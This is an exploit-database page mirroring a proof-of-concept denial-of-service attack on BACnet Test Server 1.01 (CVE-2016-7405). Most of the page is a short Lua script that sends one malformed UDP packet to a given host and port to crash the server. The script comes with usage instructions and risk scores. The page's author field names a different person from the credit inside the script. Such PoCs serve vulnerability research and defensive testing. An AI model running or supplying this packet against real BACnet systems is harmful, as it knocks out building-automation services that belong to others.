Advertisement






BACnet Test Server 1.01 - Remote Denial of Service (PoC)

CVE Category Price Severity
CVE-2016-7405 CWE-399 $0 High
Author Risk Exploitation Type Date
wit0k High Remote 2021-01-04
CVSS EPSS EPSSP
CVSS:7.8/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021010025

Below is a copy:

BACnet Test Server 1.01 - Remote Denial of Service (PoC)
-- Title => BACnet Test Server 1.01 - Remote Denial of Service (PoC)
-- Author => Rmulo, @uromulou
-- 
-- You need luasocket to run the exploit.
-- Using luarocks : luarocks install luasocket

main = function(host, port)
    local socket = require "socket"
    local udp = socket.udp()
    local data = "\x81\x09\xFF\xFE"
    print("Connecting to the server...")
    udp:settimeout(1)
    udp:setsockname("*", 0)
    udp:setpeername(host, port)
    print("Sending malicious packages...")
    udp:send(data)
end
print("=> BACnet Test Server 1.01 - Remote Denial of Service (PoC)")
print("=> This was written by Rmulo, @uromulou.\n")
if #arg < 2 then
        print("-> lua exploit.lua [HOST] [PORT]")
        print("-> lua exploit.lua 127.0.0.1 47808")
    else
        main(arg[1], arg[2])
end

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum